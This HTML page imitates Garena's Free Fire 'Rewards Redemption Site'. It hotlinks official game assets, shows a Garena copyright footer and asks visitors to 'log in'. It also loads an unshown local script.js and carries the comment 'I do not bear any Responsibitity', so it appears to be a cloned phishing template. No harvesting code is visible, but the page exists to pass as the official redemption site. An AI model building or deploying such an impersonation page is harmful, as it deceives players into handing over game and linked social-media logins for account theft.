<html lang="en" data-build-timestamp-utc="2024-02-27T03:17:15.403Z"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta http-equiv="x-dns-prefetch-control" content="on">
  <meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
  <title>Free Fire</title>
  <link rel="icon" href="https://dl.dir.freefiremobile.com/common/web_event/tweb-event/FFSH/assets-common/ff-logo-icon.png" type="image/x-icon">
  <link rel="shortcut icon" href="https://dl.dir.freefiremobile.com/common/web_event/tweb-event/FFSH/assets-common/ff-logo-icon.png" type="image/x-icon">
  <meta name="description" content="">
  <meta name="author" content="">
  <meta name="title" content="FreeFire">
  <meta name="description" content="FreeFire">
  <meta property="og:title" content="FreeFire">
  <meta property="og:description" content="FreeFire">
</head>
  <body>
    <div id="app" bis_skin_checked="1"><div class="main" bis_skin_checked="1">
      <div data-v-cad87a84="" class="home-wrapper" bis_skin_checked="1">
        <div data-v-cad87a84="" class="home-container" bis_skin_checked="1">
          <div data-v-cad87a84="" class="home" bis_skin_checked="1">
            <div data-v-490a8a26="" data-v-cad87a84="" class="header" bis_skin_checked="1">
              <div data-v-490a8a26="" class="header-content" bis_skin_checked="1">
                <div data-v-490a8a26="" class="header__logo" bis_skin_checked="1">
                </div>
              </div>
            </div>
            <div data-v-cad87a84="" class="home__right" bis_skin_checked="1">
              <div data-v-f545a424="" data-v-cad87a84="" class="main" bis_skin_checked="1">
                <div data-v-f545a424="" class="main-header" bis_skin_checked="1">
                  <h2 data-v-f545a424="" class="main__title">Rewards Redemption Site</h2>
                  <span data-v-f545a424="" class="main__description">Please log in.</span>
                </div>
              </div>

<link href="style.css" rel=stylesheet/>

<!-- I do not bear any Responsibitity -->

<script src="script.js"></script>

<div data-v-f423ab84="" data-v-cad87a84="" class="home-panel home__panel" bis_skin_checked="1">
  <h4 data-v-f423ab84="" class="home-panel__title">Important Notice:</h4> <ol data-v-f423ab84="" class="list">
    <li class="list__item">
1. Redemption code has <span class="highlight">12/16</span> characters, consisting of capital letters and numbers.
</li>
<li class="list__item">
2. Item rewards are shown in <span class="highlight"> [vault] </span> tab in game lobby; Golds or diamonds will add in account wallet automatically.
</li>
<li class="list__item">3. Please note redemption expiration date. Any expired codes cannot be redeemed.</li>
<li class="list__item">4. Please contact customer service if you encountered any issue.</li>
<li class="list__item">5. Reminder: you will not be able to redeem your rewards with guest accounts. You may bind your account to Facebook or VK in order to receive the rewards.</li></ol></div></div></div></div> <footer data-v-3a03f104="" data-v-cad87a84="" class="footer"><div data-v-3a03f104="" class="footer-rule-wrap" bis_skin_checked="1"><div data-v-3a03f104="" class="footer-rule-container" bis_skin_checked="1"><div data-v-3a03f104="" class="footer-rule" bis_skin_checked="1"><span data-v-3a03f104="">Important Notice:</span> <div data-v-cdfa79b6="" data-v-3a03f104="" class="footer-rule__icon image-container" bis_skin_checked="1"> <img data-v-cdfa79b6="" src="https://dl.dir.freefiremobile.com/common/web_event/tweb-event/redemption/img/arrow.png" alt="" class="image"></div> <div data-v-f423ab84="" data-v-3a03f104="" class="home-panel footer-rule__panel" bis_skin_checked="1"><h4 data-v-f423ab84="" class="home-panel__title">Important Notice:</h4> <ol data-v-f423ab84="" class="list"><li class="list__item">
1. Redemption code has <span class="highlight">12/16</span> characters, consisting of capital letters and numbers.
</li>
<li class="list__item">
2. Item rewards are shown in <span class="highlight"> [vault] </span> tab in game lobby; Golds or diamonds will add in account wallet automatically.
</li>
<li class="list__item">3. Please note redemption expiration date. Any expired codes cannot be redeemed.</li>
<li class="list__item">4. Please contact customer service if you encountered any issue.</li>
<li class="list__item">5. Reminder: you will not be able to redeem your rewards with guest accounts. You may bind your account to Facebook or VK in order to receive the rewards.</li></ol></div></div></div></div> <div data-v-3a03f104="" class="copyright" bis_skin_checked="1"><div data-v-cdfa79b6="" data-v-3a03f104="" class="icon image-container" bis_skin_checked="1"> <img data-v-cdfa79b6="" src="https://dl.dir.freefiremobile.com/common/web_event/tweb-event/redemption/img/logo_small_foot.jpg" alt="" class="image"></div> <div data-v-3a03f104="" class="copyright-message" bis_skin_checked="1"><p data-v-3a03f104="">Copyright © Garena International.</p> <p data-v-3a03f104="">
        Trademarks belong to their respective owners. All rights Reserved.
</p>
</div>
</div>
</footer>
      </div>
    </div></div>
  </body>
</html>
